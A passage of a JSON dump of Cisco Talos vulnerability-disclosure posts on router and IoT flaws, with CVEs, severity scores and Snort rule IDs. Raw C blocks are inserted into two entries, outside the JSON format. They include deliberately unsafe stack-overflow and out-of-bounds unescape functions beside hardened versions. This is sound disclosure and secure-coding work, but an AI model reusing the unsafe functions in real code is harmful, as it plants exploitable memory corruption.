\n\nThe InRouter is an industrial LTE router that includes remote management functionalities and several security protection mechanisms, such as VPN connections and a firewall.\n\nThis is just the latest set of vulnerabilities Talos has discovered in the InRouter302. [We previously outlined](<https://blog.talosintelligence.com/2022/05/blog-post-.html>) how an attacker could string together several other since-patched security issues to gain root access to the device.\n\n[TALOS-2022-1523](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1523>) (CVE-2022-25932) is actually an updated vulnerability for a new patch, as the previous security update to cover [TALOS-2022-1472](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1472>) and [TALOS-2022-1474](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1474>) was not effective.\n\nAdditionally, the router's firmware contains leftover code in the debug feature. The InRouter302 offers telnet and SSHD services. When provided with the correct credentials, both will allow access to the router's console. From the console, an attacker could manipulate several crucial security settings, including providing a specific command to manipulate the firmware signature verification flag and upload malicious firmware to the device.\n\nThese vulnerabilities are:\n\n * [TALOS-2022-1518](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1518>) (CVE-2022-29481)\n * [TALOS-2022-1519](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1519>) (CVE-2022-30543)\n * [TALOS-2022-1520](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1520>) (CVE-2022-26023)\n * [TALOS-2022-1521](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1566>) (CVE-2022-28689)\n\n[TALOS-2022-1522](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1522>) (CVE-2022-29888) could be exploited if an attacker sends the device a specially crafted HTTP request. 
If exploited correctly, the adversary could gain the ability to delete arbitrary files on the device, potentially disrupting its operations or settings.\n\nCisco Talos worked with InHand Networks to ensure that these issues are resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\n\n\nUsers are encouraged to update these affected products as soon as possible: InHand Networks InRouter302, version 3.5.45. Talos tested and confirmed these versions of the router could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 59152, 59153, 59882 - 59884 and 59886. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-27T15:04:42", "type": "talosblog", "title": "Vulnerability Spotlight: Vulnerabilities in InHand router could give attackers access to console, delete files", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-25932", "CVE-2022-26023", "CVE-2022-28689", "CVE-2022-29481", "CVE-2022-29888", "CVE-2022-30543"], "modified": "2022-10-27T15:04:42", "id": "TALOSBLOG:6C4E58699BB90DB08778A81DD308563F", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-inhand-router-302-oct-2022/", "cvss": {"score": 
0.0, "vector": "NONE"}}, {"lastseen": "2023-04-04T15:37:47", "description": "\n\n_Christopher McBee and Dave McDaniel of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network's range.\n\nA mesh system allows users to set up multiple access points to the Wi-Fi in their homes using various access points. Netgear's Orbi system connects to the user's modem or gateway and uses \"satellites\" to extend the Wi-Fi signal to different places throughout the home.\n\nTalos discovered a vulnerability in the Orbi Satellite -- [TALOS-2022-1596](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1596>) (CVE-2022-37337) -- that could lead to arbitrary command execution on the device. The user needs to authenticate into the mesh system first, meaning they'd need to access an unprotected network or the login credentials of a password-protected network, for this attack to be successful. Then, the adversary needs to send a specially crafted HTTP request to trigger the vulnerability.\n\nTwo other issues, [TALOS-2022-1595](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1595>) (CVE-2022-38452) and [TALOS-2022-1597](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1597>) (CVE-2022-36429), exist in the main Orbi router that could also lead to arbitrary command execution if the adversary sends a specially crafted network request or JSON object, respectively.\n\n[TALOS-2022-1598](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1598>) (CVE-2022-38458) also exists in the router. 
In this case, though, an adversary can carry out a man-in-the-middle attack to trick the service's Web Services Management tool into disclosing sensitive information.\n\nCisco Talos worked with Netgear to ensure that TALOS-2022-1596, TALOS-2022-1597 and TALOS-2022-1598 are resolved and an update is available for affected customers. However, the company is still developing a patch for TALOS-2022-1595, though we are disclosing this vulnerability according to our 90-day timeline outlined in [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Netgear Orbi Satellite RBS750, version 4.6.8.5. Talos tested and confirmed these versions of the Orbi system could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60474 - 60477 and 60499. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. 
For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T17:50:53", "type": "talosblog", "title": "Vulnerability Spotlight: Netgear Orbi router vulnerable to arbitrary command execution", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36429", "CVE-2022-37337", "CVE-2022-38452", "CVE-2022-38458"], "modified": "2023-03-21T17:50:53", "id": "TALOSBLOG:D8BE2B71060558D1F88AC6B123A6160E", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-netgear-orbi-router-vulnerable-to-arbitrary-command-execution/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-14T08:11:11", "description": "\n\n_Lilith >_> of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered three vulnerabilities in Asus router software.\n\nThe Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like other routers, it is configurable via an HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in more of an IOT style.\n\nTalos has identified [TALOS-2022-1586](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1586>) (CVE-2022-35401), an authentication bypass vulnerability that can lead to full administrative privileges. 
An attacker would need to send a series of HTTP requests to exploit this vulnerability.\n\n[TALOS-2022-1590](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1590>) (CVE-2022-38105) is an information disclosure vulnerability in the opcode of the router's configuration service that can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.\n\n[TALOS-2022-1592](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1592>) (CVE-2022-38393) is a denial of service vulnerability, also in the opcode of the configuration service. A specially crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability.\n\nCisco Talos worked with [Asus](<https://www.asus.com/us/networking-iot-servers/wifi-routers/asus-gaming-routers/rt-ax82u/>) to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco's vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update this affected product as soon as possible: Asus RT-AX82U 3.0.0.4.386_49674-ge182230. Talos tested and confirmed this version of Asus could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against these vulnerabilities: 60394 and 60473. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. 
For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-10T16:20:21", "type": "talosblog", "title": "Vulnerability Spotlight: Asus router access, information disclosure, denial of service vulnerabilities discovered", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-35401", "CVE-2022-38105", "CVE-2022-38393"], "modified": "2023-01-10T16:20:21", "id": "TALOSBLOG:85B7EC75A8466C2794CC85DD62E3FDA3", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-asus-router-access-information-disclosure-denial-of-service-vulnerabilities-discovered/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-28T10:23:46", "description": "_Vulnerabilities discovered by Carl Hurd and Jared Rittle of Cisco Talos._ \n \nCisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution. \n \n\n\n## Overview\n\n \nThere are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads to the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. 
Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20. However, these can only be exploited with an authenticated session. The remote code execution happens in the context of the HTTPD process. However, since HTTPD runs as root, an attacker can run code with elevated privileges. \n \nAll vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS-2018-0620, which was found only on HWv3 FRNv1.3.0. \n \n\n\n### TALOS-2018-0617 \u2014 TP-Link TL-R600VPN HTTP denial of service\n\n \nAn exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated. \n \nCVE: CVE-2018-3948 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617>). \n \n\n\n### TALOS-2018-0618 \u2014 TP-Link TL-R600VPN HTTP server information disclosure\n\n \nAn exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system. \n \nCVE: CVE-2018-3949 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618>). \n \n\n\n### TALOS-2018-0619 \u2014 TP-Link TL-R600VPN HTTP server ping address remote code execution\n\n \nAn exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. 
The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability. \n \nCVE: CVE-2018-3950 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619>). \n \n\n\n### TALOS-2018-0620 \u2014 TP-Link TL-R600VPN HTTP server fs directory remote code execution\n\n \nAn exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability. \n \nCVE: CVE-2018-3951 \n \nA full technical advisory is available [here](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620>). \n \n\n\n## Discussion\n\n \nOver the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest examples showing that this equipment is not only vulnerable but also lacks the generic operating system protections that mitigate vulnerabilities like buffer overflows. Fortunately, in the case of TL-R600VPN routers, the critical vulnerabilities that lead to remote code execution require authentication. However, the resulting code runs with root privileges. 
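The two root causes the advisory names, shown side by side as an added example that is not TP-Link's code (the function names, buffer sizes and sample inputs are assumptions made here): an unbounded copy of 'ping_addr' into a fixed stack buffer next to a bounded and validated version, and a lexical path normaliser that refuses both the traversal behind TALOS-2018-0618 and the directory-instead-of-file request that triggers the TALOS-2018-0617 loop.

```c
#include <arpa/inet.h>
#include <stddef.h>
#include <string.h>

/* Reconstruction of the TALOS-2018-0619 pattern as the advisory describes
 * it (not TP-Link's code): the 'ping_addr' value is copied into a fixed
 * stack buffer with no size check, so anything of 32 bytes or more
 * overwrites the stack. Kept only to show the bug. */
int ping_handler_unsafe(const char *ping_addr)
{
    char addr[32];

    strcpy(addr, ping_addr);
    return (int)strlen(addr);
}

/* Hardened form: the length is checked against both buffers, and the value
 * has to parse as an IPv4 or IPv6 literal before it reaches the ping or
 * traceroute logic (this assumes the field carries addresses only; a
 * hostname field would need its own validator). Returns 1 if accepted and
 * copied into out, 0 if rejected. */
int ping_addr_accept(const char *ping_addr, char *out, size_t outlen)
{
    size_t n = strlen(ping_addr);
    struct in_addr a4;
    struct in6_addr a6;

    if (n == 0 || n >= INET6_ADDRSTRLEN || n >= outlen)
        return 0;
    if (inet_pton(AF_INET, ping_addr, &a4) != 1 &&
        inet_pton(AF_INET6, ping_addr, &a6) != 1)
        return 0;
    memcpy(out, ping_addr, n + 1);
    return 1;
}

int ping_addr_ok(const char *ping_addr)
{
    char out[INET6_ADDRSTRLEN];
    return ping_addr_accept(ping_addr, out, sizeof out);
}

/* Lexical confinement for the TALOS-2018-0617/0618 cases: resolves "." and
 * ".." in an already URL-decoded request path, refuses any path that would
 * climb above the web root, and refuses paths that name a directory (empty,
 * trailing '/', or nothing left after ".."), so the server never tries to
 * serve one. Returns 1 with the normalized path in out, 0 on rejection. */
int confine_path(const char *req, char *out, size_t outlen)
{
    const char *seg[64];
    size_t seg_len[64];
    size_t len = strlen(req), i = 0, used = 0;
    int depth = 0;
    int is_dir = (len == 0 || req[len - 1] == '/');

    while (i < len) {
        size_t start, l;

        while (i < len && req[i] == '/')
            i++;                                  /* skip separators */
        if (i >= len)
            break;
        start = i;
        while (i < len && req[i] != '/')
            i++;
        l = i - start;
        if (l == 1 && req[start] == '.')
            continue;
        if (l == 2 && req[start] == '.' && req[start + 1] == '.') {
            if (depth == 0)
                return 0;                         /* would escape the root */
            depth--;
            continue;
        }
        if (depth == 64)
            return 0;
        seg[depth] = req + start;
        seg_len[depth++] = l;
    }
    if (depth == 0 || is_dir)
        return 0;                                 /* a directory, not a file */

    for (int k = 0; k < depth; k++) {
        if (used + 1 + seg_len[k] + 1 > outlen)
            return 0;
        out[used++] = '/';
        memcpy(out + used, seg[k], seg_len[k]);
        used += seg_len[k];
    }
    out[used] = '\0';
    return 1;
}

int path_maps_to(const char *req, const char *want)
{
    char out[256];
    return confine_path(req, out, sizeof out) == 1 && strcmp(out, want) == 0;
}

int path_rejected(const char *req)
{
    char out[256];
    return confine_path(req, out, sizeof out) == 0;
}
```

The path check runs after URL decoding on purpose: a normaliser that sees "%2e%2e" instead of ".." would pass the traversal through, which is also why the decoder itself has to be correct (the FreshTomato/DD-WRT unescape bug later in this page is the same family of mistake).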
\n \n[](<http://3.bp.blogspot.com/-dOUdAKn0kko/W_LMi0_j5uI/AAAAAAAAEpk/hvKaeSGCOnA4CAwr9SdyT5cDlnhtpuqKACK4BGAYYCw/s1600/patch_availability_available.jpg>) \n\n\n## Coverage\n\n \nThe following Snort IDs have been released to detect these vulnerabilities: \n \n\n\n * [47039-47040](<https://snort.org/advisories/577>)\n * [47037](<https://snort.org/advisories/577>)\n * [47062](<https://snort.org/advisories/577>)\n\n", "cvss3": {}, "published": "2018-11-19T06:30:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-3948", "CVE-2018-3949", "CVE-2018-3950", "CVE-2018-3951"], "modified": "2018-12-13T19:21:57", "id": "TALOSBLOG:F88EBAD7133FBE1A890AF58350AF7356", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/Fl3lfhKMbXM/tplinkr600.html", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-07-29T16:16:05", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNnc_WyzIll9pkp1ejQtwbwjsesRh6ABVsdizOaKhGsGesVxL20yfZrO-MtoCWdUaqGMJQdyfmFq41aQgLQGCYgQiXL1eI0Nz8DPnSdEtYMP_M2Ydmwc4qMU7jsle7kYkqFKERD-mO9pJkv9G6I83siJKzCF8qO4AhD5huSDz0E23rCy_W0B7eV4Qv/s1001/vuln%20spotlight.jpg>)\n\n \n_ \n_\n\n_By Francesco Benvenuto. _\n\nRecently, I was performing some research on a wireless router and noticed the following piece of code: \n\n\n\nThis unescape function will revert the URL encoded bytes to its original form. But something specifically caught my attention: There was no size check for the performed operations and the function assumes that after a \u2018%\u2019 there are always two bytes. So, what would happen if after \u2018%\u2019, only one character existed? The answer is that the s+3, in the strcpy, will access after the end of the string. So, it could lead to memory corruption. \n\nThen, I tried to exploit this bug on the router in question. 
But based on how the URL string was managed in that device, it was not possible. But it had the potential to crash other web servers that used this piece of code. That function belonged to the FreshTomato library. So, I searched for the source code and noticed that at the beginning of the file containing that function, there was the following comment: \n\n\n\nIt was code from Broadcom. I searched for pieces of those comments on Google and found some projects using that code. Then, I also used grep.app, writing a regex to catch the layout of the bug, and found other projects. Some of these projects were code that can be tinkered with and/or in web server scenarios. So, we tested the code and eventually contacted multiple vendors regarding vulnerabilities in their respective products. \n\nThe code used by each of the different projects is so similar that it is reasonable to assume that it was taken from the same initial source. Seeing as how the code originally held a Broadcom copyright, it is likely that the code was part of a reference implementation that Broadcom released to help customers implement an HTTP server using a product from Broadcom. This vulnerability becomes more interesting as the vulnerable products are looked at in more depth, including the open-source software ArduPilot. This software is an open-source autonomous vehicle package, not tied to Broadcom in any way, so the vulnerable code made its way into the code base without a direct reference implementation. This sort of extended code reuse is extraordinarily difficult to track down even with modern-day secure coding practices due to code being slightly modified to suit each use case specifically. 
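The bug pattern described above, as an added illustration that is not code from the post and not the Broadcom, FreshTomato, DD-WRT, Asuswrt or APWeb source: a reconstruction of the unsafe decoder (a '%' assumed to carry two bytes, and a tail shift that starts at the original s + 3) next to a bounds-checked replacement. The function names (unescape_unsafe, unescape_safe, hexval) and the sample request string are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Reconstruction of the pattern the post describes (not the Broadcom,
 * FreshTomato, DD-WRT, Asuswrt or APWeb source): a '%' is assumed to be
 * followed by two bytes, and the tail of the string is shifted down with
 * a copy that starts at the original s + 3. For input ending in "%x" or
 * "%" that copy starts past the terminator. Kept only to show the bug. */
void unescape_unsafe(char *s)
{
    unsigned int c = 0;

    while ((s = strpbrk(s, "%+")) != NULL) {
        if (*s == '%') {
            sscanf(s + 1, "%02x", &c);            /* no check that two hex digits exist */
            *s++ = (char)c;
            memmove(s, s + 2, strlen(s + 2) + 1); /* strlen() starts at original s + 3 */
        } else {
            *s++ = ' ';
        }
    }
}

static int hexval(unsigned char ch)
{
    if (ch >= '0' && ch <= '9') return ch - '0';
    if (ch >= 'a' && ch <= 'f') return ch - 'a' + 10;
    if (ch >= 'A' && ch <= 'F') return ch - 'A' + 10;
    return -1;
}

/* Hardened form. Every byte after a '%' is checked before it is used, so
 * a truncated "%x", a bare "%" or a non-hex "%zz" is copied literally and
 * no read or write ever passes the terminator. Decoding is in place (the
 * output is never longer than the input) and single-pass, so "%2541"
 * becomes "%41" rather than being decoded twice. Returns the new length. */
size_t unescape_safe(char *s)
{
    const char *in = s;
    char *out = s;

    while (*in) {
        if (*in == '%') {
            int hi = hexval((unsigned char)in[1]);          /* in[1] may be NUL: -1 */
            int lo = hi >= 0 ? hexval((unsigned char)in[2]) : -1;
            if (hi >= 0 && lo >= 0) {
                *out++ = (char)((hi << 4) | lo);
                in += 3;
                continue;
            }
            *out++ = *in++;                                 /* malformed: keep '%' */
        } else if (*in == '+') {
            *out++ = ' ';
            in++;
        } else {
            *out++ = *in++;
        }
    }
    *out = '\0';
    return (size_t)(out - s);
}

/* Helper: decode a copy of in with the safe routine, compare with want. */
int safe_decodes_to(const char *in, const char *want)
{
    char buf[128];
    if (strlen(in) >= sizeof buf) return 0;
    strcpy(buf, in);
    unescape_safe(buf);
    return strcmp(buf, want) == 0;
}

/* Same for the unsafe routine; only ever fed well-formed input here, where
 * it is still correct. Its failure mode is undefined behaviour, not a value. */
int unsafe_decodes_to(const char *in, const char *want)
{
    char buf[128];
    if (strlen(in) >= sizeof buf) return 0;
    strcpy(buf, in);
    unescape_unsafe(buf);
    return strcmp(buf, want) == 0;
}

int main(void)
{
    /* Constructed request string: one valid escape, one '+', one truncated escape. */
    char req[] = "/cgi-bin/ping?host=10.0.0.%31&note=hello+world&tail=%4";
    size_t n = unescape_safe(req);

    printf("%s (%zu bytes)\n", req, n);   /* the trailing "%4" survives as literal text */
    return 0;
}
```

The practical takeaway for anyone auditing a copied decoder: look for the terminator check before every `s[1]` and `s[2]` dereference, and for a single forward pass rather than a shift-the-tail loop; both are what a grep for this bug family across forks should key on.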
For these reasons, it is extraordinarily important for developers to be vigilant in reviewing external functionality that is modified and inserted into a code base, as well as for security researchers to investigate issues that could easily be slightly mutated across multiple software packages. \n\nBelow are the vulnerabilities we disclosed and helped fix as part of this discovery. TALOS-2022-1509, TALOS-2022-1511 and TALOS-2022-1512 have been patched by their respective companies or maintainers. Talos additionally confirmed TALOS-2022-1510 is present in revisions 32270 to at least revision 48599 but was unpatched at the time of publishing, so later versions are also likely vulnerable.\n\n \n\n\n#### [TALOS-2022-1509](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509>) (CVE-2022-28664 - CVE-2022-28665) \n\nA memory corruption vulnerability in the httpd\u2019s unescape functionality of FreshTomato, version 2022.1. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. \n\n \n\n\n#### [TALOS-2022-1510](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510>) (CVE-2022-27631) \n\nA memory corruption vulnerability in the httpd\u2019s unescape functionality of DD-WRT from Revision 32270 to Revision 48599 \u2014 a Linux-based firmware for embedded systems. Later versions of this product could also be vulnerable, as Talos recently confirmed that the issue was unpatched. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. \n\n \n\n\n#### [TALOS-2022-1511](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511>) (CVE-2022-26376) \n\nA memory corruption vulnerability in both the official Asuswrt firmware as well as the Asuswrt-Merlin New Gen open-source firmware alternative for Asus wireless routers. 
The vulnerability exists in the httpd\u2019s unescape functionality of these firmwares. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. ASUSWRT, the company\u2019s user interface software for managing Asus devices, is also affected by this vulnerability. \n\n \n\n\n#### [TALOS-2022-1512](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1512>) (CVE-2022-28711) \n\nA memory corruption vulnerability in the cgi.c\u2019s unescape functionality of ArduPilot APWeb from master branch 50b6b7ac to master branch 46177cb9. ArduPilot is an open-source software suite that allows users to program autonomous flying and driving devices like drones. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T16:22:00", "type": "talosblog", "title": "Vulnerability Spotlight: How a code re-use issue led to vulnerabilities across multiple products", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2022-26376", "CVE-2022-27631", "CVE-2022-28664", "CVE-2022-28665", "CVE-2022-28711"], "modified": "2022-07-29T14:01:04", "id": "TALOSBLOG:C5180F1E61B3AFB5FC8CDD116ED91BB4", "href": "http://blog.talosintelligence.com/2022/07/vulnerability-spotlight-how-code-re-use.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T08:21:29", "description": "[](<http://4.bp.blogspot.com/-UCVz750WFnc/XQfLKNiuy0I/AAAAAAAAG-4/PepLnAmhPOcStpiuTQHnyB_-DzrXcpLwACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg>)_ \n_ \n_Dave McDaniel of Cisco Talos discovered these vulnerabilities._ \n\n\n### Executive summary\n\nKCodes\u2019 NetUSB kernel module contains two vulnerabilities that could allow an attacker to inappropriately access information on some NETGEAR wireless routers. Specific models of these routers utilize the kernel module from KCodes, a Taiwanese company. The module is custom-made for each device, but they all contain similar functions. \n \nThe module shares USB devices over TCP, allowing clients to use various vendor-made drivers and software to connect to these devices. An attacker could send specific packets on the local network to exploit vulnerabilities in NetUSB, forcing the routers to disclose sensitive information and even giving the attacker the ability to remotely execute code. \n \nIn accordance with our coordinated disclosure policy, Cisco Talos reached out to KCodes and NETGEAR regarding this vulnerability. After working with KCodes, they provided an update to NETGEAR, which is scheduled to release an update. Talos decided to release the details of our vulnerability after surpassing our 90-day deadline. 
\n\n\n### Vulnerability details\n\n**KCodes NetUSB unauthenticated remote kernel arbitrary memory read vulnerability (TALOS-2019-0775/CVE-2019-5016)** \n \nAn exploitable arbitrary memory read vulnerability exists in the KCodes NetUSB.ko kernel module which enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. A specially crafted index value can cause an invalid memory read, resulting in a denial of service or remote information disclosure. An unauthenticated attacker can send a crafted packet on the local network to trigger this vulnerability. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0775>) for additional information. \n \n**KCodes NetUSB unauthenticated remote kernel information disclosure vulnerability (TALOS-2019-0776/CVE-2019-5017)** \n \nAn exploitable information disclosure vulnerability exists in the KCodes NetUSB.ko kernel module that enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. An unauthenticated, remote attacker can craft and send a packet containing an opcode that will trigger the kernel module to return several addresses, one of which can be used to calculate the dynamic base address of the module for further exploitation. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0776>) for additional information. \n\n\n### Versions tested\n\nTalos tested and confirmed that TALOS-2019-0776 and TALOS-2019-0775 affect the NETGEAR Nighthawk AC3200 (R8000), firmware version 1.0.4.28_10.1.54 \u2014 NetUSB.ko 1.0.2.66. The NETGEAR Nighthawk AC3000 (R7900), firmware version 1.0.3.8_10.0.37 (11/1/18) \u2014 NetUSB.ko 1.0.2.69 is also affected by TALOS-2019-0775. 
\n[](<http://1.bp.blogspot.com/-F9akqwfHSKE/XQfK9xpUpTI/AAAAAAAAG-w/R6B_tElvubE6nkPTaKIUTL2uKqjKldjqACK4BGAYYCw/s1600/patch_availability_nopatch.jpg>) \n\n\n### \n\n\n### \n\n\n### Coverage\n\nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: 49087 \n\n\n \n\n\n", "cvss3": {}, "published": "2019-06-17T10:17:36", "type": "talosblog", "title": "Vulnerability Spotlight: Two bugs in KCodes NetUSB affect some NETGEAR routers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5016", "CVE-2019-5017"], "modified": "2019-06-17T10:17:36", "id": "TALOSBLOG:57AE67D092003BFBA2D8AC2BAB81030D", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/75kFzCzc-tI/vulnerability-spotlight-two-bugs-in.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2018-10-16T18:24:08", "description": 